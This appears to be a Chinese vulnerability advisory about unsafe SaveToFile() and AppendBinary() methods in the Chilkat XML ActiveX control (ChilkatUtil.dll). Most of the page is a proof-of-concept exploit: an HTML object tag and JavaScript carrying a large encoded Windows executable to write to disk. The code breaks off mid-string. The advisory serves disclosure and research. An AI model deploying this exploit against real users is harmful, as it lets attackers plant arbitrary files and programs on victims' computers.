首页 -> 安全研究

安全研究

安全漏洞
Chilkat XML ActiveX控件不安全方式调用漏洞

发布日期:2008-09-23
更新日期:2008-09-24

受影响系统:
Chilkat Software ChilkatUtil.dll 3.0.3.0
描述:
BUGTRAQ  ID: 31332

Chilkat XML ActiveX是免费的XML解析器组件。

ChilkatUtil.dll库所提供的ChilkatUtil.CkData.1 ActiveX控件包含有不安全的SaveToFile()和AppendBinary()方式。如果向SaveToFile()和SaveToTempFile()方式提供了恶意filename或templateFilename参数的话,就可能导致保存或覆盖指定的文件;此外攻击者还可以利用AppendBinary()方式向已创建的文件附加任意字节。

<*来源:shinnai (shinnai@autistici.org
  
  链接:http://secunia.com/advisories/31951/
        http://www.shinnai.net/xplits/TXT_rNowA1916DKFNUF48NyS
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<object classid='clsid:5022FAE8-B780-4B78-B8DC-1AF1145A4F42' id='test'></object>
<script language='javascript'>
var HelloWorld = unescape("%u5A4D%u0090%u0003%u0000%u0004%u0000%uFFFF%u0000" +
                           "%u00B8%u0000%u0000%u0000%u0040%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0080%u0000" +
                           "%u1F0E%u0EBA%uB400%uCD09%uB821%u4C01%u21CD%u6854" +
                           "%u7369%u7020%u6F72%u7267%u6D61%u6320%u6E61%u6F6E" +
                           "%u2074%u6562%u7220%u6E75%u6920%u206E%u4F44%u2053" +
                           "%u6F6D%u6564%u0D2E%u0A0D%u0024%u0000%u0000%u0000" +
                           "%u4550%u0000%u014C%u0005%uA3DC%u48D7%u1600%u0000" +
                           "%u01CF%u0000%u00E0%u0307%u010B%u3802%u0A00%u0000" +
                           "%u1200%u0000%u0200%u0000%u1220%u0000%u1000%u0000" +
                           "%u2000%u0000%u0000%u0040%u1000%u0000%u0200%u0000" +
                           "%u0004%u0000%u0001%u0000%u0004%u0000%u0000%u0000" +
                           "%u6000%u0000%u0400%u0000%u1E37%u0001%u0003%u0000" +
                           "%u0000%u0020%u1000%u0000%u0000%u0010%u1000%u0000" +
                           "%u0000%u0000%u0010%u0000%u0000%u0000%u0000%u0000" +
                           "%u5000%u0000%u02AC%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u742E%u7865%u0074%u0000" +
                           "%u08F4%u0000%u1000%u0000%u0A00%u0000%u0400%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0060%u6000" +
                           "%u642E%u7461%u0061%u0000%u0040%u0000%u2000%u0000" +
                           "%u0200%u0000%u0E00%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0040%uC000%u722E%u6164%u6174%u0000" +
                           "%u0100%u0000%u3000%u0000%u0200%u0000%u1000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000" +
                           "%u622E%u7373%u0000%u0000%u00B0%u0000%u4000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0080%uC000%u692E%u6164%u6174%u0000" +
                           "%u02AC%u0000%u5000%u0000%u0400%u0000%u1200%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0040%uC000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u8955%u83E5%u18EC%u5D89%u8BF8%u0855%uDB31%u7589" +
                           "%u8BFC%u3102%u8BF6%u3D00%u0091%uC000%u4377%u8D3D" +
                           "%u0000%u72C0%uBE5B%u0001%u0000%u04C7%u0824%u0000" +
                           "%u3100%u89C0%u2444%uE804%u0794%u0000%uF883%u7401" +
                           "%u856C%u74C0%uC72A%u2404%u0008%u0000%uD0FF%uFFBB" +
                           "%uFFFF%u89FF%u8BD8%uFC75%u5D8B%u89F8%u5DEC%u04C2" +
                           "%u3D00%u0093%uC000%uBD74%u943D%u0000%u74C0%u89BB" +
                           "%u8BD8%uFC75%u5D8B%u89F8%u5DEC%u04C2%u8D00%u0076" +
                           "%u053D%u0000%u75C0%uC7E8%u2404%u000B%u0000%uF631" +
                           "%u7489%u0424%u37E8%u0007%u8300%u01F8%u3474%uC085" +
                           "%uCD74%u04C7%u0B24%u0000%uFF00%uEBD0%uC7A1%u2404" +
                           "%u0008%u0000%u01BB%u0000%u8900%u245C%uE804%u070E" +
                           "%u0000%uF685%u8874%u45E8%u0002%uBB00%uFFFF%uFFFF" +
                           "%u81EB%u04C7%u0B24%u0000%uB900%u0001%u0000%uFFBB" +
                           "%uFFFF%u89FF%u244C%uE804%u06E4%u0000%u62E9%uFFFF" +
                           "%uEBFF%u900D%u9090%u9090%u9090%u9090%u9090%u9090" +
                           "%u8955%u53E5%uEC83%u8D24%uF85D%u04C7%u0024%u4010" +
                           "%uE800%u076A%u0000%uEC83%uE804%u01F2%u0000%u45C7" +
                           "%u00F8%u0000%uB800%u4000%u0040%u558D%u89F4%u245C" +
                           "%u8B10%u000D%u4020%u8900%u2444%u8904%u2454%u8908" +
                           "%u244C%uC70C%u2404%u4004%u0040%uB1E8%u0006%uA100" +
                           "%u4010%u0040%uC085%u5874%u10A3%u4020%u8B00%uD815" +
                           "%u4050%u8500%u0FD2%u8B85%u0000%u8300%uE0FA%u2074" +
                           "%u10A1%u4040%u8900%u2444%u8B04%uD81D%u4050%u8B00" +
                           "%u304B%u0C89%uE824%u0666%u0000%u158B%u50D8%u0040" +
                           "%uFA83%u74C0%u8B1B%u101D%u4040%u8900%u245C%u8B04" +
                           "%uD80D%u4050%u8B00%u5051%u1489%uE824%u0640%u0000" +
                           "%u2BE8%u0006%u8B00%u101D%u4020%u8900%uE818%u011E" +
                           "%u0000%uE483%uE8F0%u05F6%u0000%u088B%u4C89%u0824" +
                           "%u158B%u4000%u0040%u5489%u0424%u04A1%u4040%u8900" +
                           "%u2404%uA9E8%u0000%u8900%uE8C3%u05C2%u0000%u1C89" +
                           "%uE824%u069A%u0000%u4489%u0424%u158B%u50D8%u0040" +
                           "%u428B%u8910%u2404%uE5E8%u0005%u8B00%uD815%u4050" +
                           "%uE900%uFF55%uFFFF%u768D%u8D00%u27BC%u0000%u0000" +
                           "%u8955%u83E5%u08EC%u04C7%u0124%u0000%uFF00%uD015" +
                           "%u4050%uE800%uFEC8%uFFFF%u8D90%u26B4%u0000%u0000" +
                           "%u8955%u83E5%u08EC%u04C7%u0224%u0000%uFF00%uD015" +
                           "%u4050%uE800%uFEA8%uFFFF%u8D90%u26B4%u0000%u0000" +
                           "%u8B55%uE80D%u4050%u8900%u5DE5%uE1FF%u748D%u0026" +
                           "%u8B55%uDC0D%u4050%u8900%u5DE5%uE1FF%u9090%u9090" +
                           "%u8955%u5DE5%u57E9%u0002%u9000%u9090%u9090%u9090" +
                           "%u8955%u83E5%u08EC%uE483%uB8F0%u0000%u0000%uC083" +
                           "%u830F%u0FC0%uE8C1%uC104%u04E0%u4589%u8BFC%uFC45" +
                           "%u6BE8%u0004%uE800%u0106%u0000%u04C7%u0024%u4030" +
                           "%uE800%u055A%u0000%u04C7%u0E24%u4030%uE800%u053E" +
                           "%u0000%u00B8%u0000%uC900%u90C3%u9090%u9090%u9090" +
                           "%uB955%u3100%u0040%uE589%u14EB%uB68D%u0000%u0000" +
                           "%u518B%u8B04%u8301%u08C1%u8201%u0000%u0040%uF981" +
                           "%u3100%u0040%uEA72%uC35D%u9090%u9090%u9090%u9090" +
                           "%u8955%uDBE5%u5DE3%u90C3%u9090%u9090%u9090%u9090" +
                           "%u8955%u83E5%u08EC%u20A1%u4020%u8B00%u8508%u74C9" +
                           "%uEB26%u900D%u9090%u9090%u9090%u9090%u9090%u9090" +
                           "%u10FF%u0D8B%u2020%u0040%u518B%u8D04%u0441%u20A3" +
                           "%u4020%u8500%u75D2%uC9E9%u8DC3%u26B4%u0000%u0000" +
                           "%u8955%u53E5%uEC83%uA104%u18E0%u0040%uF883%u74FF" +
                           "%u8529%u89C0%u74C3%u8913%u8DF6%u27BC%u0000%u0000" +
                           "%u14FF%uE09D%u4018%u4B00%uF675%u04C7%u2024%u4013" +
                           "%uE800%uFECA%uFFFF%u5B5B%uC35D%u0D8B%u18E4%u0040" +
                           "%uC031%uC985%u0AEB%u8B40%u8514%u18E4%u0040%uD285" +
                           "%uF475%uBDEB%uB68D%u0000%u0000%uBF8D%u0000%u0000" +
                           "%u8955%u53E5%uEC83%uA104%u4020%u0040%uC085%u3675" +
                           "%uE0A1%u4018%uBB00%u0001%u0000%u1D89%u4020%u0040" +
                           "%uF883%u74FF%u8525%u89C0%u74C3%u900F%u748D%u0026" +
                           "%u14FF%uE09D%u4018%u4B00%uF675%u04C7%u2024%u4013" +
                           "%uE800%uFE5A%uFFFF%u5B5B%uC35D%u0D8B%u18E4%u0040" +
                           "%uC031%uC985%u0AEB%u8B40%u8514%u18E4%u0040%uD285" +
                           "%uF475%uC1EB%u9090%u9090%u9090%u9090%u9090%u9090" +
                           "%uA155%u4070%u0040%uE589%u8B5D%u0448%uE1FF%uF689" +
                           "%uBA55%u0042%u0000%uE589%u0F53%uC0B7%uEC83%u8964" +
                           "%u2454%u8D08%uA855%uDB31%u5489%u0424%u0489%uFF24" +
                           "%uB415%u4050%uBA00%u001F%u0000%u01B9%u0000%u8300" +
                           "%u0CEC%uC085%u0775%u46EB%uC901%u784A%u800E%u2A7C" +
                           "%u41A8%uF475%uCB09%uC901%u794A%u83F2%u3C3B%u0775" +
                           "%uD889%u5D8B%uC9FC%uB9C3%u3044%u0040%uEABA%u0000" +
                           "%u8900%u244C%u890C%u2454%uC708%u2404%u3071%u0040" +
                           "%u90B8%u4030%u8900%u2444%uE804%u0292%u0000%uBCB8" +
                           "%u4030%uBB00%u00E4%u0000%u4489%u0C24%u5C89%u0824" +
                           "%uD7EB%uB48D%u0026%u0000%u8D00%u27BC%u0000%u0000" +
                           "%u8955%u57E5%u5356%uEC81%u00CC%u0000%u0D8B%u4070" +
                           "%u0040%uC985%u0874%u658D%u5BF4%u5F5E%uC35D%u45C7" +
                           "%u4198%u4141%uA141%u3020%u0040%u758D%uC798%u9C45" +
                           "%u4141%u4141%u45C7%u41A0%u4141%u8941%uB845%u24A1" +
                           "%u4030%uC700%uA445%u4141%u4141%u45C7%u41A8%u4141" +
                           "%u8941%uBC45%u28A1%u4030%uC700%uAC45%u4141%u4141" +
                           "%u45C7%u41B0%u4141%u8941%uC045%u2CA1%u4030%uC700" +
                           "%uB445%u4141%u4141%u4589%uA1C4%u3030%u0040%u4589" +
                           "%uA1C8%u3034%u0040%u4589%uA1CC%u3038%u0040%u4589" +
                           "%uA1D0%u303C%u0040%u4589%u0FD4%u05B7%u3040%u0040" +
                           "%u8966%uD845%u3489%uFF24%uB015%u4050%u0F00%uC0B7" +
                           "%uEC83%u8504%u89C0%u4485%uFFFF%u0FFF%u3B85%u0001" +
                           "%uC700%u2404%u003C%u0000%u93E8%u0002%u8500%u89C0" +
                           "%u0FC3%u5984%u0001%uFC00%uC789%u858B%uFF44%uFFFF" +
                           "%u0FB9%u0000%uF300%uC7AB%u0443%u1850%u0040%u01B9" +
                           "%u0000%uC700%u0843%u1430%u0040%u40A1%u4040%uC700" +
                           "%u3C03%u0000%u8B00%u4415%u4040%uC700%u2843%u0000" +
                           "%u0000%u4389%uA114%u2030%u0040%u5389%u8B18%u3415" +
                           "%u4020%u8900%u1C43%u50A1%u4040%u8900%u2053%u43C7" +
                           "%uFF30%uFFFF%u89FF%u2C43%u158B%u203C%u0040%u38A1" +
                           "%u4020%u8900%u3853%u1FBA%u0000%u8900%u3443%uF689" +
                           "%uD889%uC821%uF883%u1901%u24C0%u0120%u04C9%u8841" +
                           "%u2A84%uFF48%uFFFF%u794A%uA1E7%u3020%u0040%u8589" +
                           "%uFF68%uFFFF%u24A1%u4030%u8900%u6C85%uFFFF%uA1FF" +
                           "%u3028%u0040%u8589%uFF70%uFFFF%u2CA1%u4030%u8900" +
                           "%u7485%uFFFF%uA1FF%u3030%u0040%u8589%uFF78%uFFFF" +
                           "%u34A1%u4030%u8900%u7C85%uFFFF%uA1FF%u3038%u0040" +
                           "%u4589%uA180%u303C%u0040%u4589%u0F84%u05B7%u3040" +
                           "%u0040%u8966%u8845%u858D%uFF48%uFFFF%u0489%uFF24" +
                           "%uA815%u4050%u0F00%uF8B7%uEC83%u8504%u75FF%u3142" +
                           "%u85D2%u75D2%u891E%u241C%u63E8%u0001%u8900%u2434" +
                           "%u15FF%u50B0%u0040%uEC83%u0F04%uC0B7%u5FE8%uFFFD" +
                           "%u89FF%u89C3%u701D%u4040%u8D00%u0443%u60A3%u4040" +
                           "%u8D00%u0843%u80A3%u4040%u8D00%uF465%u5E5B%u5D5F" +
                           "%u89C3%uE8F8%uFD38%uFFFF%uD839%uFA89%uB175%uB1EB" +
                           "%u3BE8%u0001%u9000%u9090%u9090%u9090%u9090%u9090" +
                           "%u8951%u83E1%u08C1%u003D%u0010%u7200%u8110%u00E9" +
                           "%u0010%u8300%u0009%u002D%u0010%uEB00%u29E9%u83C1" +
                           "%u0009%uE089%uCC89%u088B%u408B%uFF04%u90E0%u9090" +
                           "%u8955%u83E5%u18EC%u458B%u8914%u2444%u8B10%u1045" +
                           "%u4489%u0C24%u458B%u890C%u2444%u8B08%u0845%u4489" +
                           "%u0424%uD8A1%u4050%u8300%u40C0%u0489%uE824%u00EE" +
                           "%u0000%uD8A1%u4050%u8300%u40C0%u0489%uE824%u00CE" +
                           "%u0000%uB9E8%u0000%u9000%u9090%u9090%u9090%u9090" +
                           "%u25FF%u50D0%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50D4%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50C8%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u5100%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50CC%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50E0%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50C4%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u5104%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50FC%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50F4%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50F8%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50E4%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50EC%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50F0%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50B8%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50AC%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50B4%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50B0%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u25FF%u50A8%u0040%u9090%u0000%u0000%u0000%u0000" +
                           "%u8955%u5DE5%uA7E9%uFFF9%u90FF%u9090%u9090%u9090" +
                           "%uFFFF%uFFFF%u18D0%u0040%u0000%u0000%uFFFF%uFFFF" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%uFFFF%uFFFF%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u4000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u18F0%u0040%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%uFFFF%uFFFF%u0000%u0000%uFFFF%uFFFF" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u6548%u6C6C%u206F%u6F57%u6C72%u2164%u000A%u4150" +
                           "%u5355%u0045%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u4C2D%u4249%u4347%u5743%u3233%u452D%u2D48%u2D32" +
                           "%u4A53%u4A4C%u472D%u4854%u2D52%u494D%u474E%u3357" +
                           "%u0032%u0000%u3377%u5F32%u6873%u7261%u6465%u7470" +
                           "%u2D72%u733E%u7A69%u2065%u3D3D%u7320%u7A69%u6F65" +
                           "%u2866%u3357%u5F32%u4845%u535F%u4148%u4552%u2944" +
                           "%u2500%u3A73%u7525%u203A%u6166%u6C69%u6465%u6120" +
                           "%u7373%u7265%u6974%u6E6F%u6020%u7325%u0A27%u0000" +
                           "%u2E2E%u2E2F%u2F2E%u6367%u2F63%u6367%u2F63%u6F63" +
                           "%u666E%u6769%u692F%u3833%u2F36%u3377%u2D32%u6873" +
                           "%u7261%u6465%u702D%u7274%u632E%u0000%u6547%u4174" +
                           "%u6F74%u4E6D%u6D61%u4165%u2820%u7461%u6D6F%u202C" +
                           "%u2C73%u7320%u7A69%u6F65%u2866%u2973%u2029%u3D21" +
                           "%u3020%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                           "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
                    &

建议:
厂商补丁:

Chilkat Software
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.chilkatsoft.com/

浏览次数:2900
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障